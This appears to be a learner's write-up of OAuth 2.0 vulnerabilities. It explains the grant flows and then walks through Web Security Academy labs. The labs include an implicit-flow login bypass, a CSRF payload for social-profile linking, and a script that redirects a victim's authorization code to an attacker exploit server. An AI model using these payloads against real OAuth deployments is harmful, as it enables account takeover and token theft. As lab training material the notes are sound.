# OAuth 2.0 authentication vulnerabilities
# Basic Concept
Oauth was designed to share data between different application.
## OAuth 2.0 Framework component
- Client application
- Resource Owner
- Oauth Platform: **The Authentication server the grant token and management interaction between the client application and Source owner.**
OAuth2.0 Methodology
OAuth uses APIs to interact with the Authentication Server and the Resource Server.
## Oauth Flows
In the OAuth process, the Client Application needs to obtain a token from the Authorization Server before it can access resources on the Resource Server.
## OAuth Scope
When client application need to access user data from Oauth Platform, they use scope parameter to specify what resource they want to retrieve
Scope Example
```
scope=user
scope=user.meowhecker
scope=user-list
scope=https://oauth-authorization-server.com/auth/scopes/user/username.readonly
```
## Authorization code grant type
Authorization code grant is a kind of Outh2.0 type
Step 1,2,3,4 -> Client To Server
Step 5,6,7,8,9 -> Server To Server
### Auth Request
```
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
```
Parameter Analysis
**Client_id**
-> Required (unique Value) Client_id be generated when client application register toward Auth server
**Redirect_url** (Attack Surface!)
when client application received auth code, client application will redirect our route to specify Value.
**Response_type**
Tell the Outh2.0 Platform what kind of grant type that was expected !
Code = Authentication Code Grant
**Scope**
Used to specify which subset of the user's data the client application wants to access.
**State**
Passing a unique value that is tied to current session
It like CSRF Token. making sure that the request to its /callback endpoint(redirect URL) is from the same person who initiated the OAuth flow.
### User login and consent
Login -> User Identification
consent -> Scope
### Authentication Code Grant
When client application received Auth Code. it will execute callback function
```
GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com
```
code -> Auth Code
### Access Token Request
AuthCode To Access Token
```
POST /token HTTP/1.1
Host: oauth-authorization-server.com
…
client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8
```
client_secret
**Client_secret** (Store in Client application ) was assigned when registering with Oauth Server
**Authorization_code**
Make sure the new application endpoint knows which grant type is Authentication code
### Access Token Grant
The OAuth service will validate the access token request. If everything is as expected, the server responds by granting the client application an access token with the requested scope.
```jsonld
{
"access_token": "z0y9x8w7v6u5",
"token_type": "Bearer",
"expires_in": 3600,
"scope": "openid profile",
…
}
```
access_token, scope
### API Call
```
GET /userinfo HTTP/1.1
Host: oauth-resource-server.com
Authorization: Bearer z0y9x8w7v6u5
```
### Resource grant
```
{
"username":"carlos",
"email":"carlos@carlos-montoya.net",
…
}
```
In the case of OAuth authentication, it will typically be used as an ID to grant the user an authenticated session, effectively logging them in.
## Implicit grant
Implicit grant type is far less secure, because all communication is browser to server. it's easily be modify by client side.
Implicit grant usually be use to single or desktop application. The Reason is those type application didn't have back-end to store the client_secret in database !
### Authentication Request
```
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=token&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
```
response_type = "Token" Tell Oauth used Implicit grant to verify the user identification.
### User login and consent
This process is exactly the same as for the authorization code flow.
### Access token grant
```
GET /callback#access_token=z0y9x8w7v6u5&token_type=Bearer&expires_in=5000&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com
```
### API Call
Unlike in the authorization code flow, this also happens via the browser.
```
GET /userinfo HTTP/1.1
Host: oauth-resource-server.com
Authorization: Bearer z0y9x8w7v6u5
```
### Resource grant
```jsonld
{
"username":"carlos",
"email":"carlos@carlos-montoya.net"
}
```
# Identification
Depending on the grant type(Implicit grant), we have opportunity to intercept sensitive data.
Recon
```
Stander Endpoints
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
```
Look up response or Document
## Exploiting OAuth2.0 vulnerabilities
Vulnerabilities can arise in the client application's implementation of OAuth as well as in the configuration of the OAuth service itself.
## LAB - Client Application didn't check
Victim Information
carlos
carlos@carlos-montoya.net.
Our Valid Credential
wiener:peter.
### Authentication Request
The user is redirected to the authentication server to initiate the OAuth 2.0 authorization process.
Initial Request:
```
Location: /interaction/{ClientID}
```
### User login / consent
URL: /oauth2.0-Server/interaction/
-> Handle user interaction for Oauth2.0 Authentication.
/interaction/TMVibu4QyWdNsbiFrPYGj/login
/interaction/{ClientID}/confirm
Response
```
Location: https://oauth-0a24004c044930d280e8478c02fe001c.oauth-server.net/auth/{ClientID}
```
### Authorization Server Response
After the user finishes identification and verification, the authorization server sends back an access token.
Response
```
Location: https://0a6b009d041b30ed80aa49ca00a00021.web-security-academy.net/oauth-callback#access_token=2LHKsCtcrsn614znZsRfdEUAczuWPH68GgRB1KMW-20&expires_in=3600&token_type=Bearer&scope=openid%20profile%20email
```
The Url will carry the Access Token -> And redirect to Callback URL
## Callback URL (Handling the Access Token)
The client retrieves user data from the OAuth resource endpoint using the access token.
CallBack.js
```javascript=
<script>
const urlSearchParams = new URLSearchParams(window.location.hash.substr(1));
const token = urlSearchParams.get('access_token');
fetch('https://oauth-0ab500ed0437d24280056a1d02d50096.oauth-server.net/me', {
method: 'GET',
headers: {
'Authorization': 'Bearer ' + token,
'Content-Type': 'application/json'
}
})
.then(r => r.json())
.then(j =>
fetch('/authenticate', {
method: 'POST',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json'
},
body: JSON.stringify({
email: j.email,
username: j.sub,
token: token
})
}).then(r => document.location = '/'))
</script>
```
### API Call (User Information)
Callback.js : Fetch Function-> /oauth-0a24004c044930d280e8478c02fe001c.oauth-server.net/me
Response
{"sub":"wiener","name":"Peter Wiener","email":"wiener@hotdog.com","email_verified":true}
### Web site Login endpoint
/Authentication
Session -> OucFwZbUuMl9Mm8fYtMl489F63UnN8Yr
Session = username + email + Token
username/email/token form Outh Server
client Application didn't check whether the tokes is match username and email
Solved!!!
## Flawed CSRF Protection
Many Components of the Oauth flows are optional.
Some of them are strongly recommended unless unless there's an important reason not to use them.
e.g. state parameter!
. If an application lacks an unpredictable value (such as the state parameter) to protect against CSRF
, This allows attacker to exploit Oauth functionalities to perform CSRF Attack.
### LAB:No CSRF Protection in OAuth Profile Linking
#### Website Account Login Flow
Login in by Social Account
GET /interaction/pz9ZSssJpgLnW-MGT-5km
/interaction/pz9ZSssJpgLnW-MGT-5km/login
#### Authorization Request:
GET /auth/pz9ZSssJpgLnW-MGT-5km
GET /interaction/pz9ZSssJpgLnW-MGT-5km
#### Confirm Interaction
POST /interaction/pz9ZSssJpgLnW-MGT-5km/confirm
### Social Profile linking Lack CSRF protection
GET /oauth-linking?code=SXDhWz1CftF6Gt_k7sL4DDonZ8_OmMvx4nD3_jF2YIy
- This URL allows the attacker to attach a website account to a social account.
- The URL does not contain a CSRF token.
#### Exploit it
To exploit this vulnerability, we can drop the OAuth linking check and pass the following payload to the victim.
If victim their session cookie is valid. the attacker can link the victim's website account with the attacker's social account.
Deliver Payload to victim
```javascript=
<script>window.location.href = "https://0a6b008f038cfdef8076309e0071003d.web-security-academy.net/oauth-linking?code=opYuDxMO5QYrDjXj6xUtRQxBGMkd9yD8BQENyoIyv-t"</script>
```
Log out current account and login into our social account
Now, our username is administrator !
Solved!
## Leaking authorization codes and access tokens
The issue occur when the server didn't check the redirect_url property, It allow the attacker induce the server send the Authenticate code to Attacker Server !
### LAB: Leak Authentication Code via redirect_url Parameter
### Identify
Attempting induce the client application send request to our C2
We received leak credential !
#### Exploit
```
<script>window.location.href = "https://oauth-0a99005303237533833cdf3b02db00d9.oauth-server.net/auth?client_id=azbjs8kshdlj73ex34dla&redirect_uri=https://exploit-0af60079033675928319e02b011c00c8.exploit-server.net/oauth-callback&response_type=code&scope=openid%20profile%20email"</script>
```
/oauth-callback?code=n9GDX7_GQZQISI8oqjyyXiuqU7anX71W1RbbimcU4f8
Attempt Login with this Authentication Code
Solved
### Flawed redirect_uri validation
Google Drive
Gist
Clipboard
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
